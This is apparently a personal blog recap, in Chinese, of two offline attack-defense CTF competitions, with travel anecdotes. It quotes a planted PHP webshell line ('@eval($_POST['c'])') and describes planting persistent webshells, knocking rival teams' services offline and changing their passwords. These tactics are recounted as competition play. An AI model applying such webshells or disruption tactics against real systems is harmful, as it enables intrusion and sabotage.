上海市大学生网络安全竞赛线下赛
emmmm 感觉又玩成了大乱斗模式。
两个 Web 一个 Pwn,我们队比较佛系,来了两个 Web 手和一个逆向手,逆向手全程 patch 就完了,pwn 到下午才有人打出来,pwn 也差不了太多,主要是 Web。
比赛开始正常备份改密码,然后 D 盾扫了一波,并没有扫出什么后门,不对啊这种比赛应该会有预留后门的。。。 然后惊奇发现有队开始打 web2了,比较懵逼。
被打了不行马上抓流量,我抓流量的脚本上去但是不好使。。。运维大手子抓了下流量,发现原来尼玛主办方预留了个后门:
这后门留的我也是佛了,藏在了 hits 文件夹了,不得不说官方预留后门越来越隐蔽了。
大家大部分都是直接 cat /flag,而我想着种上不死马,但是我的脚本适用于 php eval命令执行的… 所以不能直接用,还要用终端 echo "马" > "文件名"
这样来写,就很麻烦,不死马中单引号双引号搞的我很难受。
没办法最后我先写了个简单的一句话进去,然后用简单的一句话写不死马,但是大家已经修的差不多了emmm。
基本就是用这个洞和不死马得分,然后 web1 开始宕机,怎么修也修不好,只好去重置服务,因为真的是宕机扣分太多了。
好了没有多长时间,又宕机了,才意识肯定是有人搅屎,然后发现数据库被人动了,修了半天也没修上,主办方也没说重置服务扣多少分,也没去重置服务。
然后还有半小时结束的时候,主办方说免费三次重置,超过次数扣分,但是最后半小时不能重置服务了。。。就这样苟到最后,赛后和师傅们交流,都是一大批一大批去重置服务,因为重置扣的分没有服务正常加的分多… 服务宕机扣的分真是太狠了。
web1 后台有弱密码,改了密码因为源码里写的是原来的预留密码,所以连不上数据库就宕机,第一的队伍,就是靠疯狂改别人的密码,然后疯狂拿服务正常的分,只能说这个比赛我也是佛了,他们队到快中午的时候,web2 预留后门的洞还没有修。
这里得说一下 web1,全场都没人打动,这个web1给我们的用户权限太低了,/var/www/html 都没有写权限,那打个锤子。。。 快结束的时候队友发现了个隐藏的 apache 用户,但是没有密码,赛后听说直接 su 不用密码也能登录?出题人 · 真实。
总结一下比赛:
- 强队靠挖洞,弱队靠抓流量,抓流量的脚本一定要准备好,这样的话可以抄作业直接打;
- 防御做的还不好,比如这次忘备份数据库了… 还有就是文件监控之类的脚本,以及查看进程及时杀不死马之类的;
- 打宕别人服务,可以拿很多分,有时候你打不成,但是你把别人服务都打宕,可能你就赢了…把别人打宕还可以让他们的 web 手忙于修,没法专心审代码挖洞。
东华大学那个喜天游酒店好贵啊,一晚上双人标间 350,没有单人间,然后我们三个人只好两个双人标间,住了两晚,我的两个队友比赛第二天早上就坐飞机回学校了,而我坐飞机去长沙打湖湘杯。
湖湘杯线下
下飞机发现机场连地铁都没有… 导航发现去酒店坐公交要转好多站,直接打了个出租过去。
去报道发现湖南人原来也好热情,组织人员的服务都特别好。我中午1点左右到的酒店,有很多的服务人员,热心地给我办报道和入住的相关手续,问我吃没吃午饭,我说没吃他们还领我去里面吃了午饭,很 nice!
不得不说,湖湘杯主办方是真的有钱,比赛奖金70个队一个队3k,第一名16w不说,让我们住长沙红星国际酒店,酒店住的非常舒服,服务很到位,管吃管住条件还这么好可以说是非常良心了。
一天半的比赛,第一天上午是 AWD 模式,第一天下午是 KingTheHill 模式,第二天下午是真实渗透的模式,对于这一天半的比赛,我只能说这比赛槽点太多了…
全场屏蔽信号不许外网,然后我们什么也没准备,除了 AWD 其他时间都是基本在摸鱼,全都是 cms 生挖挖不动啊…
而且 AWD 模式打的十分混乱,很恶心。
- 80 个队,网实在是太卡了,经常一直在那里转啊转。只给了页面提交 flag 的方式,我只好抓包去写交flag的脚本,而且交 flag 的平台也老崩,脚本卡死根本跑不动,我的脚本到处都是
try except pass
… - 主办方在根目录预留了个 .shell.php 的后门,很直接就是
@eval($_POST['c'])
,不过最骚的是这个后门删不掉。。。删了后几十秒它又会自动生成,我以为是进程里的结果找了半天也没发现,没办法只好写脚本一直删这个后门。 - 平台差评,又丑又不好用,看不到自己服务器情况,被打了和宕机了都不知道…
- 服务器 ssh 的密码竟然是每个队的志愿者告诉我们,志愿者好像也不是很懂这些所以也就说的稀里糊涂的,不过还好我算是听懂了我们的志愿者说的,用户名密码都是 user 就登进去了。中午吃饭才发现原来好多队都被这个奇葩的方法坑了,有的队压根就没志愿者,还有的队志愿者没跟他们说。有个同学他们竟然是自己挖洞写马然后菜刀运维服务器…惊了。还有的队上来专改别人的 ssh 密码,被改密码就很惨,我感觉这个事情有点良心不安就只改了自己的密码。
- 中午吃饭和一航师傅聊天才得知这比赛选手间互通没隔离。。。他说看到了好多选手开了 phpstudy,还有的直接就是弱密码,直接可以打进选手电脑里…当时幸亏我没开啥端口和服务不然自己主机直接被日了2333。还有的选手电脑被提权了,太狠了。
- 比赛快结束我全局一搜 eval 才发现原来主办方还留了一个后门… 留的后门有丶多啊 mmp,我们一直被打而且还被种了不死马,很难受,
感觉 AWD 比较可惜,发现了预留后门后我直接把我不死马的脚本种上去了,但是由于比较卡的缘故,我写进去了生成不死后门的 php 文件,但是没有及时访问让这个 php 执行。其实我这个都是一套的,写进去然后访问,都是一套自动执行,只是比赛平台太卡了,我的脚本还老异常,就非常难受,没有把不死马种上。中午有人跟我说看到了我写的 gml.php,直接就给删了,我心里是凉凉的。。。只可惜没有及时访问这个 gml.php。
后面两场因为没外网如同废了,基本全程摸鱼。我们队在一个角落里,后面正好有吃的喝的,然后我们就一直吃喝,好多队都不知道那里有吃的2333,很舒服。
因为学校有事情第二天下午就赶紧回学校了,正好有 BCTF,蓝莲花出题国际赛题目质量应该很高而且小西师傅说他出的题很有趣,就做了做题,然后就自闭了,不多说上一下 BCTF 的解题情况:
Blue-Lotus 的师傅们太强了,等着 docker 复现一波吧….